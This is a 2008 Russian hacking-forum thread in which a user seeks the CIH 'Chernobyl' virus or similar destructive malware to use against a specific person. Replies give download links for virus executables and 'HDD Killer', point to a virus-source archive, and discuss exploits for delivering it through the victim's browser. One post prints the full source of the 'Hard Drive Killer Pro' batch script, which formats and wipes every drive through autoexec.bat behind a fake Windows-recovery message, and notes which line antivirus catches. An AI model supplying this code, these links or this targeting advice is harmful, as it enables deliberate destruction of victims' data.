Ищу "Чернобыль"

Discussion in 'Безопасность и Анонимность' started by qwerra, 30 Apr 2008.

  1. qwerra

    qwerra Elder - Старейшина

    Joined:
    21 Apr 2007
    Messages:
    211
    Likes Received:
    68
    Reputations:
    4
    Ищу прямой линк на закачку старого,но классного виря "Чернобыль" или схожего с ним,короче,чтобы вызывал подобные деструктивные действия на железе жертвы,в идеале,мне нужна ссылка,нажав которую этот штрих подхватывает вирусяку)))
    (оч. надо наказать одного чела)
    Заранее Биг сенкс. :d
     
  2. Vid0k

    Vid0k Elder - Старейшина

    Joined:
    24 Dec 2007
    Messages:
    393
    Likes Received:
    125
    Reputations:
    13
    а ручками поработать
    вот вторая ссылку из гугла http://file025.mylivepage.com/chunk25/399471/233/Милый%20вирус-Чернобыль.exe
     
  3. FoX's

    FoX's Дохлый

    Joined:
    26 Dec 2004
    Messages:
    169
    Likes Received:
    29
    Reputations:
    0
    он под 9x
     
  4. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    гыг сам невидел что такое чернобыль. если это скрипт то возможно если экзэшка то тебе понадобится сплоит для загрузки екзе через браузер жертвы. Ихмо нармальных в паблике нету. даже под осла трудно найти не то что под оперу или лиса. а вот приват как всегда на высоте
     
  5. brasco2k

    brasco2k Elder - Старейшина

    Joined:
    23 Nov 2007
    Messages:
    258
    Likes Received:
    91
    Reputations:
    0
    Чернобыль only windows 9x, юзай генератор "Кузя"
     
  6. MaZaHaKer

    MaZaHaKer Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    93
    Likes Received:
    33
    Reputations:
    0
    генераторы для ламеров и с кузей толкового не напишешь . CIH устарел . Можешь смотреть его исходники , может усовершенствоваешь . А вообще _http://vx.netlux.org/vl
    тебе в помощь.
     
  7. Olegros911

    Olegros911 Banned

    Joined:
    7 Apr 2008
    Messages:
    135
    Likes Received:
    40
    Reputations:
    -7
    Пахать на хр не будет.Хотя слишал и о разновидности на хр.А почему именно чернобиль.?Сейчас есть очень много приличных но и смертоносных вирусов.Посоветую тибе HDD Killer(назва сама за сябя говорит).Убеш не матиринку ему а диск :)
     
  8. Lis_ka

    Lis_ka Banned

    Joined:
    13 Mar 2008
    Messages:
    70
    Likes Received:
    7
    Reputations:
    -1
    сыль есть?
     
  9. MaZaHaKer

    MaZaHaKer Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    93
    Likes Received:
    33
    Reputations:
    0
    есть : http://hackersoft.ru/hdd_kill.html
     
  10. MaZaHaKer

    MaZaHaKer Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    93
    Likes Received:
    33
    Reputations:
    0
    еще ссылка http://black-hak.at.ua/load/0-0-0-63-20 , если та не будет работать
     
  11. Lis_ka

    Lis_ka Banned

    Joined:
    13 Mar 2008
    Messages:
    70
    Likes Received:
    7
    Reputations:
    -1
    во код HDD killer

    @echo off
    rem Fastest way to format your computer.
    :start
    cls
    echo PLEASE WAIT WHILE PROGRAM LOADS . . .
    call attrib -r -h c:\autoexec.bat >nul
    echo @echo off >c:\autoexec.bat
    echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
    call attrib +r +h c:\autoexec.bat >nul

    rem Drive checking and assigning the valid drives to the drive variable.

    set drive=
    set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

    rem code insertion for Drive Checking takes place here.
    rem drivechk.bat is the file name under the root directory.
    rem As far as the drive detection and drive variable settings, don't worry about how it
    rem works, it's damn to complicated for the average or even the expert batch programmer.
    rem Except for Tom Lavedas.

    echo @echo off >drivechk.bat
    echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
    %comspec% /e:2048 /c {t}.bat >>drivechk.bat
    del {t}.bat
    echo if errorlevel 1 goto enddc >>drivechk.bat

    cls
    echo PLEASE WAIT WHILE PROGRAM LOADS . . .

    rem When errorlevel is 1, then the above is not true, if 0, then it's true.
    rem Opposite of binary rules. If 0, it will elaps to the next command.

    echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat
    %comspec% /e:2048 /c {t}.bat >>drivechk.bat
    del {t}.bat
    echo if errorlevel 1 goto enddc >>drivechk.bat

    cls
    echo PLEASE WAIT WHILE PROGRAM LOADS . . .

    rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
    rem if errorlevel is 0, then it will elaps to the next command.

    echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
    %comspec% /e:2048 /c {t}.bat >>drivechk.bat
    del {t}.bat
    echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat

    cls
    echo PLEASE WAIT WHILE PROGRAM LOADS . . .

    rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
    rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.

    echo :enddc >>drivechk.bat

    rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".

    rem Now we will use the program drivechk.bat to attain valid drive information.

    :testdrv

    for %%a in (%alldrive%) do call drivechk.bat %%a >nul
    if %drive%.==. set drive=c
    del drivechk.bat >nul

    :form_del
    call attrib -r -h c:\autoexec.bat >nul
    echo @echo off >c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
    echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
    echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
    echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
    echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
    echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
    echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
    echo cd\ >>c:\autoexec.bat
    echo cls >>c:\autoexec.bat
    echo echo Welcome to the land of death. Hard Drive Killer Pro Version 4.0. >>c:\autoexec.bat
    echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat
    echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
    echo echo 3. This breach of your security will benefit you in the long-run, so don't worry. Think about it.>>c:\autoexec.bat

    echo echo. >>c:\autoexec.bat
    echo echo Regards, >>c:\autoexec.bat
    echo echo. >>c:\autoexec.bat
    echo echo Munga Bunga >>c:\autoexec.bat
    call attrib +r +h c:\autoexec.bat

    :makedir
    if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
    echo @echo off >c:\temp.bat
    echo %%1:\ >>c:\temp.bat
    echo cd\ >>c:\temp.bat
    echo :startmd >>c:\temp.bat
    echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2") do %%%%a >>c:\temp.bat
    echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
    echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\% %2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2 \%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\% %2\%%2\nul goto startmd >>c:\temp.bat
    call attrib +r +h c:\temp.bat >nul
    cls
    rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.
    for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
    cls
    for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
    cls
    for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
    call attrib +r +h c:\temp.bat >nul
    call attrib +r +h c:\autoexec.bat >nul
    cls
    for %%a in (%drive%) call deltree /y %%a:\*. >nul
    cls
    for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul

    cls

    :end

    ************************************************** ******************
    I was told this is the part of the code that AV Companies catch:
    echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
    ************************************************** ******************
     
  12. qwerra

    qwerra Elder - Старейшина

    Joined:
    21 Apr 2007
    Messages:
    211
    Likes Received:
    68
    Reputations:
    4
    О,оч неплохо,тока вот так вот типа тупо зайти в асю этого чела под другим ником канешна и кинуть ему сЦылку,ну,мол глянь,может те нужно :p ,сам ехе кинуть не смогу ибо уже был отключён провайдером за рассылку(выпасает сцуко) вредоносного ПО))),хотя просто с одним парнем тестили одну весчь :D ,нету линка???
     
  13. MaZaHaKer

    MaZaHaKer Elder - Старейшина

    Joined:
    19 Jan 2008
    Messages:
    93
    Likes Received:
    33
    Reputations:
    0
    "линка" на что нету ? :confused:
     
  14. qwerra

    qwerra Elder - Старейшина

    Joined:
    21 Apr 2007
    Messages:
    211
    Likes Received:
    68
    Reputations:
    4
    имею ввиду ссылочку,кинув которую этому lol,он её тупо нажимает и подхватывает виря,и пусть вирь будет чистый,даже не криптованый-у него антивиря нету))) :p
     
  15. Фещ

    Фещ Banned

    Joined:
    20 Aug 2007
    Messages:
    92
    Likes Received:
    91
    Reputations:
    -11
    было бы все так легко и просто мы бы тут уже все миллионерами были)
     
  16. Rashid

    Rashid Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    46
    Likes Received:
    4
    Reputations:
    2
    только чо то не понятно а как пользоваться hdd killer? при его запуске ничего не происходит
     
  17. Ali_MiX

    Ali_MiX Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    377
    Likes Received:
    67
    Reputations:
    -2
    он же под 95-98 на xp не пойдёт